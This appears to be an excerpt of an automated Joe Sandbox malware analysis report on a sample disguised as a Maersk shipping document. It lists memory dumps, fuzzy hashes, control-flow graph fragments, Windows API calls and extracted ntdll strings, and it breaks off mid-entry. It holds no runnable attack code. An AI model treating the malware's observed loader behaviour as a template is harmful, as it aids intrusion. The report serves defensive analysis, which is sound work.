                                                    • Opcode Fuzzy Hash: 45532fef5796af2fb043625300b3033a9db388744d779d412bacd5a18919789a
                                                    • Instruction Fuzzy Hash: DED1FA31C2075A8ACB10EB64D9517ADB7B5FF96300F50979AE04937224FB706AC9CF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1336087492.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_31b0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a74667ed9bfe9c7dff967e6618a8da84eff866226abeb3ab76da62ee62838e92
                                                    • Instruction ID: 31d335996b3c541a9164c6eaf8d0dc5079d4634a052c61342c65a4a3dca50633
                                                    • Opcode Fuzzy Hash: a74667ed9bfe9c7dff967e6618a8da84eff866226abeb3ab76da62ee62838e92
                                                    • Instruction Fuzzy Hash: C5A15036E003058FCF09DFB5D8445DEB7B2FF89300B2585AAE806AB265DB31D956CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351198590.00000000084A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_84a0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c68c9e2a184450a9a95e62f922e8146f2e651adfd526b02f44b3f2a3f52d9511
                                                    • Instruction ID: ae9aa5992b802a26a06534b57169ca00e2987590ad70a1847e255c0586121328
                                                    • Opcode Fuzzy Hash: c68c9e2a184450a9a95e62f922e8146f2e651adfd526b02f44b3f2a3f52d9511
                                                    • Instruction Fuzzy Hash: 06D1EA35C2075A8ACB10EB64D9516ADB7B5FF96300F50D79AE04937224FB706AC9CF81
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 13a455053e84d1da02524ccaa8735a23935b1f63bd23956ea0dbaeab04d6352a
                                                    • Instruction ID: df1393533e9cec060e7da8391e574e7754aa638d74c80ae5bd4e65fdb3db14ef
                                                    • Opcode Fuzzy Hash: 13a455053e84d1da02524ccaa8735a23935b1f63bd23956ea0dbaeab04d6352a
                                                    • Instruction Fuzzy Hash: 835129B4E102199BCB18DFA9C5809AEFBF6FF89304F24C169D418A7355DB349942CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1351129015.0000000007FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7fa0000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9c361dbee0c2754509df7225065f7d3f18588e143e4c0cdaeff701d9d9aee3e8
                                                    • Instruction ID: 14af6d3046926d42712a7620cc6851ec317d4d8de3e1c0f74bde9979ade54bc0
                                                    • Opcode Fuzzy Hash: 9c361dbee0c2754509df7225065f7d3f18588e143e4c0cdaeff701d9d9aee3e8
                                                    • Instruction Fuzzy Hash: E551F8B4E102199BCB18DFA9C5805AEFBF6FF89304F24C169D418AB355DB349A41CFA1

                                                    Execution Graph

                                                    Execution Coverage:1.2%
                                                    Dynamic/Decrypted Code Coverage:5.1%
                                                    Signature Coverage:8%
                                                    Total number of Nodes:137
                                                    Total number of Limit Nodes:11
                                                    [Execution graph (figure not preserved); API calls labelled on its nodes: RtlAllocateHeap, RtlFreeHeap, NtClose, LdrInitializeThunk, PostThreadMessageW, LdrLoadDll, ExitProcess]

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                    • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                    • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                    • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                    • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                    • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                    • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                    • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                    • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                    • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                    • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                    • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                    • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                    • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                    • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                    • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                    • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                    • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                    • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416
                                                    • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                    • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                    • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                    • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416

                                                    Control-flow Graph

                                                    APIs
                                                    • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID: UQ63g7r-$UQ63g7r-
                                                    • API String ID: 1836367815-2341035416

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 337 417c68-417c70 335->337 337->339 340 417c72-417c74 337->340 339->335 341 417c3a-417c3b 339->341 340->337 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 348 417bda-417bdd 343->348 344->335 347 417c99-417cae 345->347 349 417cc0-417cc1 346->349 350 417c84 346->350 352 417cb0 347->352 353 417d17-417d2b call 42b9b3 347->353 350->347 351 417c87 350->351 351->345 354 417cb2-417cbe 352->354 355 417d2e-417d3f 352->355 353->355 354->349
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 364 417c72-417c74 360->364 365 417c2e-417c38 360->365 362 417be5-417bf3 361->362 363 417c2a 361->363 362->358 370 417bb8-417bc1 363->370 371 417c2c-417c38 363->371 368 417c76-417c7a 364->368 369 417c68-417c6e 364->369 366 417c55-417c67 365->366 367 417c3a-417c3b 365->367 366->369 374 417bca-417bd7 LdrLoadDll 367->374 375 417c3d 367->375 376 417c8c-417c98 368->376 377 417c7c-417c82 368->377 369->360 372 417bc3-417bc9 370->372 373 417bda-417bdd 370->373 371->366 371->367 372->374 374->373 375->366 378 417c99-417cae 376->378 379 417cc0-417cc1 377->379 380 417c84 377->380 382 417cb0 378->382 383 417d17-417d2b call 42b9b3 378->383 380->378 381 417c87 380->381 381->376 384 417cb2-417cbe 382->384 385 417d2e-417d3f 382->385 383->385 384->379
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1886846663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 424 17e2c0a-17e2c0f 425 17e2c1f-17e2c26 LdrInitializeThunk 424->425 426 17e2c11-17e2c18 424->426
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-2160512332
                                                    Strings
                                                    • corrupted critical section, xrefs: 018154C2
                                                    • undeleted critical section in freed memory, xrefs: 0181542B
                                                    • Critical section address., xrefs: 01815502
                                                    • 8, xrefs: 018152E3
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                    • Thread identifier, xrefs: 0181553A
                                                    • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                    • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                    • double initialized or corrupted critical section, xrefs: 01815508
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                    • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                    • Invalid debug info address of this critical section, xrefs: 018154B6
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    Strings
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                    • @, xrefs: 0181259B
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    Strings
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                    • HandleTraces, xrefs: 01828C8F
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                    • VerifierDebug, xrefs: 01828CA5
                                                    • VerifierFlags, xrefs: 01828C50
                                                    • VerifierDlls, xrefs: 01828CBD
                                                    • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                    • API String ID: 0-3223716464
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    • API String ID: 0-1109411897
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-792281065
                                                    Strings
                                                    • apphelp.dll, xrefs: 01796496
                                                    • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-204845295
                                                    Strings
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                    • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                    • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1888335259.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1770000_MAERSK LINE SHIPPING DOC_4253.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    Strings
                                                    • LdrpInitializeProcess, xrefs: 017DC6C4
                                                    • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                    • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                    Memory Dump Source
